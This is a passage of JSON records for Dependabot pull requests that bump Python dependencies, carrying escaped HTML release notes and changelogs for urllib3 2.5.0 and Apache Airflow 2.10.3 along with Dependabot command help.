href=\"https://github.com/sandumjacob\"\u003e\u003ccode\u003e@​sandumjacob\u003c/code\u003e\u003c/a\u003e (5.3 Medium, GHSA-pq67-6m6q-mj2v)\u003c/li\u003e\n\u003cli\u003eRedirects are now controlled by urllib3 in the Node.js runtime — CVE-2025-50182 (5.3 Medium, GHSA-48p4-8xcf-vxj5)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14. See \u003ca href=\"https://peps.python.org/pep-0784/\"\u003ePEP 784\u003c/a\u003e for more information. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3610\"\u003e#3610\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3612\"\u003e#3612\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3581\"\u003e#3581\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3615\"\u003e#3615\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.4.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3522\"\u003e#3522\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3567\"\u003e#3567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3571\"\u003e#3571\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3555\"\u003e#3555\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eMisc\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3550\"\u003e#3550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3566\"\u003e#3566\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.3.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.5.0 (2025-06-18)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14.\nSee \u003ccode\u003ePEP 784 \u0026lt;https://peps.python.org/pep-0784/\u0026gt;\u003c/code\u003e_ for more information. (\u003ccode\u003e[#3610](https://github.com/urllib3/urllib3/issues/3610) \u0026lt;https://github.com/urllib3/urllib3/issues/3610\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ccode\u003e[#3612](https://github.com/urllib3/urllib3/issues/3612) \u0026lt;https://github.com/urllib3/urllib3/issues/3612\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a security issue where restricting the maximum number of followed\nredirects at the \u003ccode\u003eurllib3.PoolManager\u003c/code\u003e level via the \u003ccode\u003eretries\u003c/code\u003e parameter\ndid not work.\u003c/li\u003e\n\u003cli\u003eMade the Node.js runtime respect redirect parameters such as \u003ccode\u003eretries\u003c/code\u003e\nand \u003ccode\u003eredirects\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ccode\u003e[#3581](https://github.com/urllib3/urllib3/issues/3581) \u0026lt;https://github.com/urllib3/urllib3/issues/3581\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ccode\u003e[#3615](https://github.com/urllib3/urllib3/issues/3615) \u0026lt;https://github.com/urllib3/urllib3/issues/3615\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.4.0 (2025-04-10)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ccode\u003e[#3522](https://github.com/urllib3/urllib3/issues/3522) \u0026lt;https://github.com/urllib3/urllib3/issues/3522\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ccode\u003e[#3567](https://github.com/urllib3/urllib3/issues/3567) \u0026lt;https://github.com/urllib3/urllib3/issues/3567\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ccode\u003e[#3571](https://github.com/urllib3/urllib3/issues/3571) \u0026lt;https://github.com/urllib3/urllib3/issues/3571\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ccode\u003e[#3555](https://github.com/urllib3/urllib3/issues/3555) \u0026lt;https://github.com/urllib3/urllib3/issues/3555\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ccode\u003e[#3550](https://github.com/urllib3/urllib3/issues/3550) \u0026lt;https://github.com/urllib3/urllib3/issues/3550\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ccode\u003e[#3566](https://github.com/urllib3/urllib3/issues/3566) \u0026lt;https://github.com/urllib3/urllib3/issues/3566\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.3.0 (2024-12-22)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/aaab4eccc10c965897540b21e15f11859d0b62e7\"\u003e\u003ccode\u003eaaab4ec\u003c/code\u003e\u003c/a\u003e Release 2.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f\"\u003e\u003ccode\u003e7eb4a2a\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857\"\u003e\u003ccode\u003ef05b132\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d03fe327a71d09728512217149f269763671f296\"\u003e\u003ccode\u003ed03fe32\u003c/code\u003e\u003c/a\u003e Fix HTTP tunneling with IPv6 in older Python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/11661e9bb4278e43d081f47a516e287a928c2206\"\u003e\u003ccode\u003e11661e9\u003c/code\u003e\u003c/a\u003e Bump github/codeql-action from 3.28.0 to 3.29.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3624\"\u003e#3624\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/6a0ecc6b16fe30f721021b44a81d19615098c71e\"\u003e\u003ccode\u003e6a0ecc6\u003c/code\u003e\u003c/a\u003e Update v2 migration guide to 2.4.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3621\"\u003e#3621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8e32e60d9024c05bc6f7adda08bdf6c539d0b0d4\"\u003e\u003ccode\u003e8e32e60\u003c/code\u003e\u003c/a\u003e Raise exception for shutdown on a connection already released to the pool (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9996e0fbf90b77083ad3c73737a6c6395703faa9\"\u003e\u003ccode\u003e9996e0f\u003c/code\u003e\u003c/a\u003e Fix emscripten CI for Chrome 137+ (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3599\"\u003e#3599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/4fd1a99a59725faf0efc946ce3b6bc9a194420af\"\u003e\u003ccode\u003e4fd1a99\u003c/code\u003e\u003c/a\u003e Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3617\"\u003e#3617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c4b5917e911a90c8bf279448df8952a682294135\"\u003e\u003ccode\u003ec4b5917\u003c/code\u003e\u003c/a\u003e Add support for the new \u003ccode\u003ecompression.zstd\u003c/code\u003e module in Python 3.14 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3611\"\u003e#3611\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.19...2.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Armanidashh/solana-program-library/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Armanidashh/solana-program-library/pull/16","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Armanidashh%2Fsolana-program-library/issues/16","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/16/packages"},{"uuid":"2593260216","node_id":"PR_kwDOOK9uiM6akgK4","number":28,"state":"open","title":"chore(deps): bump the pip group across 11 directories with 6 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-15T05:35:27.000Z","updated_at":"2025-06-15T05:35:28.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"pip","update_count":6,"packages":[{"name":"apache-airflow","old_version":"2.6.3","new_version":"2.10.3","repository_url":"https://github.com/apache/airflow"},{"name":"requests","old_version":"2.31.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"requests","old_version":"2.23.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"py","old_version":"1.9.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"apache-airflow","old_version":"2.6.3","new_version":"2.10.3","repository_url":"https://github.com/apache/airflow"},{"name":"requests","old_version":"2.31.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 2 updates in the /composer/2022_airflow_summit directory: [apache-airflow](https://github.com/apache/airflow) and [requests](https://github.com/psf/requests).\nBumps the pip group with 2 updates in the /composer/airflow_1_samples directory: [requests](https://github.com/psf/requests) and [py](https://github.com/pytest-dev/py).\nBumps the pip group with 2 updates in the /composer/cicd_sample directory: [apache-airflow](https://github.com/apache/airflow) and [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /composer/rest directory: [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /compute/auth directory: [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /compute/encryption directory: [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /compute/metadata directory: [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /compute/oslogin directory: [requests](https://github.com/psf/requests).\nBumps the pip group with 1 update in the /dataflow/gemma directory: [keras](https://github.com/keras-team/keras).\nBumps the pip group with 2 updates in the /dataflow/run-inference directory: [torch](https://github.com/pytorch/pytorch) and [transformers](https://github.com/huggingface/transformers).\nBumps the pip group with 1 update in the /iap directory: [requests](https://github.com/psf/requests).\n\nUpdates `apache-airflow` from 2.6.3 to 2.10.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/airflow/releases\"\u003eapache-airflow's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eApache Airflow 2.10.3\u003c/h2\u003e\n\u003ch1\u003eSignificant Changes\u003c/h1\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch2\u003eBug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproves the handling of value masking when setting Airflow variables for enhanced security.  (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43123\"\u003e#43123\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43278\"\u003e#43278\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds support for task_instance_mutation_hook to handle mapped operators with index 0. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42661\"\u003e#42661\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43089\"\u003e#43089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes executor cleanup to properly handle zombie tasks when task instances are terminated. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43065\"\u003e#43065\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds retry logic for HTTP 502 and 504 errors in internal API calls to handle webserver startup issues. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42994\"\u003e#42994\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43044\"\u003e#43044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRestores the use of separate sessions for writing and deleting RTIF data to prevent StaleDataError. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42928\"\u003e#42928\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43012\"\u003e#43012\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes PythonOperator error by replacing hyphens with underscores in DAG names. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42993\"\u003e#42993\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproving validation of task retries to handle None values (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42532\"\u003e#42532\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42915\"\u003e#42915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes error handling in dataset managers when resolving dataset aliases into new datasets (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42733\"\u003e#42733\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnables clicking on task names in the DAG Graph View to correctly select the corresponding task. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/38782\"\u003e#38782\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42697\"\u003e#42697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent redirect loop on /home with tags/last run filters (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42607\"\u003e#42607\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42609\"\u003e#42609\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42628\"\u003e#42628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport of host.name in OTEL metrics and usage of OTEL_RESOURCE_ATTRIBUTES in metrics (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42428\"\u003e#42428\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42604\"\u003e#42604\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReduce eyestrain in dark mode with reduced contrast and saturation (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42567\"\u003e#42567\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42583\"\u003e#42583\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle ENTER key correctly in trigger form and allow manual JSON (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42525\"\u003e#42525\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42535\"\u003e#42535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure DAG trigger form submits with updated parameters upon keyboard submit (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42487\"\u003e#42487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42499\"\u003e#42499\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDo not attempt to provide not \u003ccode\u003estringified\u003c/code\u003e objects to UI via xcom if pickling is active (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42388\"\u003e#42388\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42486\"\u003e#42486\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix the span link of task instance to point to the correct span in the scheduler_job_loop (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42430\"\u003e#42430\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42480\"\u003e#42480\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix task execution from runner in Windows (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42426\"\u003e#42426\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42478\"\u003e#42478\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAllows overriding the hardcoded OTEL_SERVICE_NAME with an environment variable (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42242\"\u003e#42242\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42441\"\u003e#42441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproves trigger performance by using \u003ccode\u003eselectinload\u003c/code\u003e instead of \u003ccode\u003ejoinedload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/40487\"\u003e#40487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42351\"\u003e#42351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSuppress warnings when masking sensitive configs (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43335\"\u003e#43335\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43337\"\u003e#43337\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMasking configuration values irrelevant to DAG author (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43040\"\u003e#43040\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43336\"\u003e#43336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eExecute templated bash script as file in BashOperator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43191\"\u003e#43191\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes schedule_downstream_tasks to include upstream tasks for one_success trigger rule (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42582\"\u003e#42582\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43299\"\u003e#43299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd retry logic in the scheduler for updating trigger timeouts in case of deadlocks. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/41429\"\u003e#41429\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42651\"\u003e#42651\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMark all tasks as skipped when failing a dag_run manually (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eTrySelector\u003c/code\u003e for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix broken stat \u003ccode\u003escheduler_loop_duration\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude limit and offset in request body schema for List task instances (batch) endpoint (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43479\"\u003e#43479\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't raise a warning in ExecutorSafeguard when execute is called from an extended operator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42849\"\u003e#42849\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43577\"\u003e#43577\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMiscellaneous\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate session auth backend (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42911\"\u003e#42911\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved unicodecsv dependency for providers with Airflow version 2.8.0 and above (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42765\"\u003e#42765\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42970\"\u003e#42970\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove the referrer from Webserver to Scarf (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42901\"\u003e#42901\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42942\"\u003e#42942\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBump \u003ccode\u003edompurify\u003c/code\u003e from 2.2.9 to 2.5.6 in /airflow/www (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42263\"\u003e#42263\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42270\"\u003e#42270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCorrect docstring format in _get_template_context (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42244\"\u003e#42244\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42272\"\u003e#42272\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBackport: Bump Flask-AppBuilder to \u003ccode\u003e4.5.2\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43309\"\u003e#43309\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43318\"\u003e#43318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCheck python version that was used to install pre-commit venvs (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43282\"\u003e#43282\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43310\"\u003e#43310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eResolve warning in Dataset Alias migration (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43425\"\u003e#43425\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/airflow/blob/2.10.3/RELEASE_NOTES.rst\"\u003eapache-airflow's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eAirflow 2.10.3 (2024-11-04)\u003c/h2\u003e\n\u003cp\u003eSignificant 